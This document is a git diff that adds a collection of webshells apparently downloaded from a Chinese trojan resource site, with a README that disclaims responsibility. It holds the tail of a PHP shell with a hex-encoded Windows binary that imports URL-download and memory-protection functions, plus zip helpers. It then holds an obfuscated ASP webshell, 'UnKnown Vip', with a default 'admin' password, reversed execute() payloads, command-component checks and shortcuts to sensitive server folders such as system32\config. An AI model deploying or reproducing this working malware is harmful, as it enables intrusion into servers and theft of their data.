02CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
+}
+
+class eanver{
+var $out='';
+function eanver($dir){
+	if(@function_exists('gzcompress')){
+	if(count($dir) > 0){
+	foreach($dir as $file){
+		if(is_file($file)){
+			$filecode = file_get_contents($file);
+			if(is_array($dir)) $file = basename($file);
+			$this -> filezip($filecode,$file);
+		}
+	}
+	$this->out = $this -> packfile();
+	}
+	return true;
+	}
+	else return false;
+}
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+	function at($atunix = 0) {
+		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
+		if ($unixarr['year'] < 1980) {
+			$unixarr['year']    = 1980;
+			$unixarr['mon']     = 1;
+			$unixarr['mday']    = 1;
+			$unixarr['hours']   = 0;
+			$unixarr['minutes'] = 0;
+			$unixarr['seconds'] = 0;
+		} 
+		return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
+				($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
+	}
+	function filezip($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+		$dtime = dechex($this->at($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+		$this -> ctrl_dir[] = $cdrec;
+	}
+	function packfile(){
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
+	}
+}
+
+class zip
+{
+
+ var $total_files = 0;
+ var $total_folders = 0; 
+
+ function Extract ( $zn, $to, $index = Array(-1) )
+ {
+   $ok = 0; $zip = @fopen($zn,'rb');
+   if(!$zip) return(-1);
+   $cdir = $this->ReadCentralDir($zip,$zn);
+   $pos_entry = $cdir['offset'];
+
+   if(!is_array($index)){ $index = array($index);  }
+   for($i=0; $index[$i];$i++){
+   		if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
+		return(-1);
+   }
+   for ($i=0; $i<$cdir['entries']; $i++)
+   {
+     @fseek($zip, $pos_entry);
+     $header = $this->ReadCentralFileHeaders($zip);
+     $header['index'] = $i; $pos_entry = ftell($zip);
+     @rewind($zip); fseek($zip, $header['offset']);
+     if(in_array("-1",$index)||in_array($i,$index))
+     	$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
+   }
+   fclose($zip);
+   return $stat;
+ }
+
+  function ReadFileHeader($zip)
+  {
+    $binary_data = fread($zip, 30);
+    $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
+
+    $header['filename'] = fread($zip, $data['filename_len']);
+    if ($data['extra_len'] != 0) {
+      $header['extra'] = fread($zip, $data['extra_len']);
+    } else { $header['extra'] = ''; }
+
+    $header['compression'] = $data['compression'];$header['size'] = $data['size'];
+    $header['compressed_size'] = $data['compressed_size'];
+    $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
+    $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
+
+    if ($header['mdate'] && $header['mtime']){
+     $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
+     $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
+     $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
+     $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    }else{$header['mtime'] = time();}
+
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = "ok";
+    return $header;
+  }
+
+ function ReadCentralFileHeaders($zip){
+    $binary_data = fread($zip, 46);
+    $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
+
+    if ($header['filename_len'] != 0)
+      $header['filename'] = fread($zip,$header['filename_len']);
+    else $header['filename'] = '';
+
+    if ($header['extra_len'] != 0)
+      $header['extra'] = fread($zip, $header['extra_len']);
+    else $header['extra'] = '';
+
+    if ($header['comment_len'] != 0)
+      $header['comment'] = fread($zip, $header['comment_len']);
+    else $header['comment'] = '';
+
+    if ($header['mdate'] && $header['mtime'])
+    {
+      $hour = ($header['mtime'] & 0xF800) >> 11;
+      $minute = ($header['mtime'] & 0x07E0) >> 5;
+      $seconde = ($header['mtime'] & 0x001F)*2;
+      $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
+      $month = ($header['mdate'] & 0x01E0) >> 5;
+      $day = $header['mdate'] & 0x001F;
+      $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    } else {
+      $header['mtime'] = time();
+    }
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = 'ok';
+    if (substr($header['filename'], -1) == '/')
+      $header['external'] = 0x41FF0010;
+    return $header;
+ }
+
+ function ReadCentralDir($zip,$zip_name){
+	$size = filesize($zip_name);
+
+	if ($size < 277) $maximum_size = $size;
+	else $maximum_size=277;
+	
+	@fseek($zip, $size-$maximum_size);
+	$pos = ftell($zip); $bytes = 0x00000000;
+	
+	while ($pos < $size){
+		$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);
+		if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;
+	}
+	
+	$fdata=fread($zip,18);
+	
+	$data=@unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',$fdata);
+	
+	if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
+	else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
+	$centd['disk_entries'] = $data['disk_entries'];
+	$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
+	$centd['size'] = $data['size'];  $centd['disk'] = $data['disk'];
+	return $centd;
+  }
+
+ function ExtractFile($header,$to,$zip){
+	$header = $this->readfileheader($zip);
+	
+	if(substr($to,-1)!="/") $to.="/";
+	if($to=='./') $to = '';	
+	$pth = explode("/",$to.$header['filename']);
+	$mydir = '';
+	for($i=0;$i<count($pth)-1;$i++){
+		if(!$pth[$i]) continue;
+		$mydir .= $pth[$i]."/";
+		if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){
+			@chmod($mydir,0777);
+			$this->total_folders ++;
+			echo "目录: $mydir<br>";
+		}
+	}
+	
+	if(strrchr($header['filename'],'/')=='/') return;	
+
+	if (!($header['external']==0x41FF0010)&&!($header['external']==16)){
+		if ($header['compression']==0){
+			$fp = @fopen($to.$header['filename'], 'wb');
+			if(!$fp) return(-1);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp);
+			touch($to.$header['filename'], $header['mtime']);
+		}else{
+			$fp = @fopen($to.$header['filename'].'.gz','wb');
+			if(!$fp) return(-1);
+			$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
+			Chr(0x00), time(), Chr(0x00), Chr(3));
+			
+			fwrite($fp, $binary_data, 10);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 1024 ? $size : 1024);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+		
+			$binary_data = pack('VV', $header['crc'], $header['size']);
+			fwrite($fp, $binary_data,8); fclose($fp);
+	
+			$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
+			if(!$gzp) return(-2);
+			$fp = @fopen($to.$header['filename'],'wb');
+			if(!$fp) return(-1);
+			$size = $header['size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = gzread($gzp, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp); gzclose($gzp);
+		
+			touch($to.$header['filename'], $header['mtime']);
+			@unlink($to.$header['filename'].'.gz');
+			
+		}
+	}
+	
+	$this->total_files ++;
+	echo "文件: $to$header[filename]<br>";
+	return true;
+ }
+}
+ob_end_flush();
+
+?>
\ No newline at end of file
diff --git a/www-7jyewu-cn/README.md b/www-7jyewu-cn/README.md
new file mode 100644
index 0000000..087fb50
--- /dev/null
+++ b/www-7jyewu-cn/README.md
@@ -0,0 +1,6 @@
+这个都是从中国木马资源网下载而来
+url:http://www.7jyewu.cn/
+http://pan.baidu.com/share/home?uk=154628787&view=share#category/type=0
+
+
+#请谨慎使用，所造成的一切后果，与本人无关。
diff --git a/www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp b/www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp
new file mode 100644
index 0000000..5fad960
--- /dev/null
+++ b/www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp	
@@ -0,0 +1,1746 @@
+<%
+UserPass="admin" '
+'-------------------------------------------------------------------
+mName="UnKnown �߼�Vip��ɾ�շѰ�" 
+SiteURL="http://www.7jyewu.cn/"            '��վ
+Copyright="��ɱȥ���Ű� By 7jyewu.cn"    '��Ȩ
+AD="�Լ����Ű�,��Ҫ������ѽ!"   '�������
+bj="#000000"  '���ñ�����ɫ
+wz="#00FF00"  '����������ɫ
+budu="#000000"  '���ð�ť�Ի�����ɫ
+'-------------------------------------------------------------------
+'���𽫴˳������ڷǷ�;��,��������һ�к���������޹�!
+'-------------------------------------------------------------------
+Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next:sub ShowErr():If Err Then:RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,"\","\\"):End Function:Function RRePath(S):RRePath=Replace(S,"\\","\"):End Function:
+execute(shisanfun(":��>retnec/<>a/<�ط�>')(kcab.yrotsih:tpircsavaj'=ferh a<>retnec<>rb<>rb<��=lrUkcaB��:)��emaNF��(tseuqeR=emaNF��ssaPresU=pp��:)��emaN_tpircS��(selbairaVrevreS.tseuqeR=emaNrcS��:)��htaPredloF��(tseuqeR=htaPredloF��:)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=0O0O��:lru&)��tsoh_ptth��(selbairavrevres.tseuqer=1rts��:)��/��(htaPpaM.revreS=tooRWWW��:)��.��(htaPpaM.revreS=htaPtooR:)��noitcA��(tseuqeR=noitcA��:)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��:lru&)��tsoh_ptth��(selbairavrevres.tseuqer=u��:)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function SUnEnCode(ObjStr):
+Dim SNewStr:ObjStr=Replace(ObjStr,"��",""""):For i=1 To Len(ObjStr):If Mid(ObjStr,i,1) <> "��" Then:SNewStr=Mid(ObjStr,i,1)&SNewStr:Else:SNewStr=vbCrLf&SNewStr:End If:Next:SUnEnCode=SNewStr:
+End Function:
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+execute(SUnEnCode("noitcnuF dnE��rtSweNL = edoCnEnUL��txeN��fI dnE   ��rtSweNL & fLrCbv = rtSweNL             ��eslE   ��fI dnE��rtSweNL & )kP(rhC = rtSweNL             ��fI dnE             ��59 + kP = kP                     ��nehT 23 < kP fIeslE            ��59 - kP = kP                    ��nehT 621 > kP fI            ��5 - ))1 ,i ,rtSjbO(diM(csA = kP��eslE��rtSweNL & )))1 ,i ,rtSjbO(diM(csA(rhC = rtSweNL��nehT 621 > ))1 ,i ,rtSjbO(diM(csA rO 23 < ))1 ,i ,rtSjbO(diM(csA fI��nehT �˅e�� >< )1 ,i ,rtSjbO(diM fI    ��)rtSjbO(neL oT 1 = i roF��rtSweNL ,kP miD��)rtSjbO(edoCnEnUL noitcnuF")):str1=request.servervariables("http_host")&url
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mName&" - "&ServerIP&"</title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:"&bj&";color:"&wz&";}"
+RRS"input,select,textarea{font-size: 12px;color:"&wz&";background-color:"&budu&";border:1px solid "&wz&"}"
+RRS".C{background-color:#000000;border:0px}"
+RRS".cmd{background-color:#000;color:#FFF}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: "&wz&";SCROLLBAR-SHADOW-COLOR: "&wz&";SCROLLBAR-ARROW-COLOR: "&wz&";SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: black;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:"&wz&";text-decoration: none;}a:hover{color:#FFFFFF;background:#000}"
+RRS".am{color:"&wz&";font-size:11px;}"
+RRS"</style>"
+RRs"<center><font face=wingdings color=#dddddd style=font-siZe:"&font&">"&pic&"</font></center>"
+
+Set   fso =  CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(O0O0):if  f.attributes <> 39 then:f.attributes = 39:end if
+execute(LUnEnCode("�e'C'%xww�e'tsBqqtwhx%'%XWW%sjmy%''BstnyhF%kN�e%'~itgA'%xww�e'Cyunwhx4A'XWW�e'#@jzwy%swzyjw@.-ynrgzx3rwtKgI@''''BQRYMwjssn3hgf@lu%B%jzqf{3jlfU3rwtKgI@wyx%B%jzqf{3wyXqvX3rwtKgI#@jxqfk%swzyjw@.''&ȷ�����Ǿ���QVX�����''-ywjqf!.56Amylsjq3wyx-kn#@jxqfk%swzyjw@.''&ȷ�����Ǵ���������������''-ywjqf!.:Amylsjq3jzqf{3wyXgI3rwtKgI-kn!.lu1wyx-wyXqvXqqzK%stnyhszk'XWW�e'#@jzwy%swzyjw#@bn`wyX%B%jzqf{3wyXqvX3rwtKgI!jxqj#@.bn`wyX-ywjqf!.76BBn-kn%jxqj#@''Cwjysjh4A��������������QVX�����ٿ������������ȷ��CwjysjhA''BQRYMwjssn3hgf@''''%B%jzqf{3wyXqvX3rwtKgI@bn`wyX%B%jzqf{3wyXgI3rwtKgI!.8BAn-kn@''�����ָ�ʮ��ǰ�Ķ���ʾ��ֻ������һ����sa3��ʵѯ���ƿؼ����ÿɣ����ֲ�ȫ�Ķ���ʾ�Կɼ�ʱ������һʾ��ֻ��''%Bb76`wyX@''XXFU%SRZQTH%UTWI%bjrfSjqgfY`%JQGFY%WJYQF''%Bb66`wyX@''.78-WFMHWF[%XXFU%SRZQTH%IIF%bjrfSjqgfY`%JQGFY%WJYQF''%Bb56`wyX@''bjrfSjqgfY`%JQGFY%UTWI''%B%b>`wyX@''..5:-WFMHWF[%WJXZ1QQZS%YTS%.616-%^YNYSJIN%YSN%IN-bjrfSjqgfY`%JQGFY%JYFJWH''%B%b=`wyX@''556BIN%JWJM\%,ajrfswjxz,aBWJXZ%YJX%bjrfSjqgfY`%JYFIUZ''%B%b<`wyX@''556BIN%JWJM\%bjrfSjqgfY`%RTWK%JYJQJI''%B%b;`wyX@''.,aiwt|xxfu,a1,ajrfswjxz,a-XJZQF[%.XXFU1WJXZ-bjrfSjqgfY`%TYSN%YWJXSN''%B%b:`wyX@''556AIN%JWJM\%bjrfSjqgfY`%RTWK%/%YHJQJX''%B%b9`wyX@''jrfSsxIBsxI''%B%b8`wyX@''////Bi|U@yttwBinZ@jrfSgIBjxfgfyfI@;588BywtU@'+UNwj{wjX+'Bwj{wjX@#qvX~R!Bwj{nwI''%B%b7`wyX@''////Bi|U@fxBinZ@jrfSgIBjxfgfyfI@88961'+UNwj{wjX+'Bwj{wjX@#wj{wjX%qvX!Bwj{nwI''%B%b6`wyX@''///Biwt|xxfU%jxfgfyfI?GIJQT%yjO@gir3giaa'+..'myfUwjiqtK'-stnxxjX-myfUjW+'BjhwztX%fyfI@5393GIJQT3yjO3yktxtwhnRBwjin{twU''%B%b5`wyX@.76-~fwwF%|js%B%wyX#@jxqfk%swzyjw!.5An-kn!.n-wyXgIqqzK%stnyhszk'XWW�e'#@jzwy%swzyjw#@jxqfk%swzyjw@.5-wyXgIqqzK@.''�������������''-ywjqf!.''''%BB%jzqf{3wyXgI3rwtKgI-kn!.-phjmHgI%stnyhszk'XWW�e'##@''''%B%jzqf{3jrfSK3rwtkjinm3uty!jxqj#@.-ynrgzx3rwtkjinm3uty@stnyhFK%B%jzqf{3stnyhF3rwtkjinm3uty!.qqzsB&jrfSI-kn#@''wjmyT''%B%jrfSI!jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''���ڴ���Ǽ�����ע1����ȫ����giR����ѹҪ������''-yurtwu%B%jrfSI!.''giRyhfurtH''BBstnyhFK-kn%jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ͬ�ܲ���ע1����ȫ����giR�Ľ���Ҫ������''-yurtwu%B%jrfSI!.''giRjyfjwH''BBstnyhFK-kn%jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ĵĽ���Ҫ������''-yurtwu%B%jrfSI!.''wjiqtK|jS''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ı�Ŀ������������''-yurtwu%B%jrfSI!.''wjiqtKj{tR''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ı�Ŀ������������''-yurtwu%B%jrfSI!.''wjiqtK~utH''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ���ı�Ŀ������������''-yurtwu%B%jrfSI!.''jqnKj{tR''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ���ı�Ŀ���Ƹ�������''-yurtwu%B%jrfSI!.''jqnK~utH''BBstnyhFK-kn@jrfSK%B%jzqf{3jrfSK3rwtkjinm3uty!.stnyhFK1jrfSK-rwtKqqzK%stnyhszk'XWW�e'#@.-ynrgzx3rwtkwiif3uty@wjiqtK%B%jzqf{3myfUwjiqtK3rwtkwiif3uty!.wjiqtK-wjiqtK|tmX%stnyhszk'XWW�e'@.-phtqHszw#@~fquxni0''22%%'+IF+'��''Bxzyfyx3|tisn|@.-lsnwyXjqfhtQty3~fity%B~fquxni%wf{@.-jyfI%|js%B%~fity%wf{@.556%1''.-phtqHszw''-yztjrnYyjx3|tisn|%B%jrnYjmy!.-phtqHszw%stnyhszk'XWW�e'#@jxqfk%swzyjw%jxqj@jzwy%swzyjw..''�������ٴ���ִҪ��ȷ''-rwnksth-%kn!.-ptxj~%stnyhszk'XWW�e'@xwtwwJqqnpBwtwwjst3|tisn|#@jzwy%swzyjw!.-xwtwwJqqnp%stnyhszkCyunwhxf{foBjlfzlsfq%yunwhxA'XWW")):
+execute(LUnEnCode("'�����䴫����'%B%.7186-YgT?'UYYMQR]3yktxtwhnR'%B%.5186-YgT?'�����ŷ�qnfRuyrX'%B%.7176-YgT?'63qnfRuyrX3qnfRuyrX'%B%.5176-YgT?'�����ŷ�UYRX����'%B%.7166-YgT?'qnfR|jS3XYSTIH'%B%.5166-YgT?'���鷢�ռ���%qnfRO'%B%.7156-YgT?'qnfRuyrX3qnfRO'%B%.5156-YgT?'���鴫�ϼ���%iftquZUXF'%B%.71>-YgT?'63iftquZ3xynxwjU'%B%.51>-YgT?'���鴫�ϼ��ķ�����'%B%.71=-YgT?'jqnKiftquZ3iftquZk~Q'%B%.51=-YgT?'���鴫�ϼ���%uZjqnK2FX'%B%.71<-YgT?'uZjqnK3xsfxnywFyktX'%B%.51<-YgT?'���鴫��������'%B%.71;-YgT?'rfjwyX3gitiF'%B%.51;-YgT?'������������'%B%.71:-YgT?'stnyhjssth3gitiF'%B%.51:-YgT?'������������������'%B%.719-YgT?%'~wfstnyhnI3lsnyunwhX'%B%.519-YgT?'������ѹXXJHHF'%B%.718-YgT?'jsnlsJyjO3TWO'%B%.518-YgT?'����⽨XXJHHF'%B%.717-YgT?'ltqfyfH3]TIF'%B%.517-YgT?'������ִ������'%B%.716-YgT?'qqjmx3yunwhx|'%B%.516-YgT?'�������ټ���'%B%.715-YgT?'yhjogTrjyx~XjqnK3lsnyunwhX'%B%.515-YgT?.7186-YgT%rnI"))
+For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next
+
+If FolderPath<>"" then
+  Session("FolderPath")=RRePath(FolderPath)
+End If
+If Session("FolderPath")="" Then
+  FolderPath=RootPath
+  Session("FolderPath")=FolderPath
+End if:Function MainForm():RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%' height='100%'  border=0 cellpadding='0' cellspacing='0'>"
+RRS"<tr><td height='30' colspan='2'>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='60' align='center'>��ַ����</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" 
+RRS"  <tr align='center' valign='middle'>"
+RRS"<tr>��ȨĿ¼�б�����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>"
+RRS"</td></tr></form></table></center></td></tr><tr><td width='170'>"
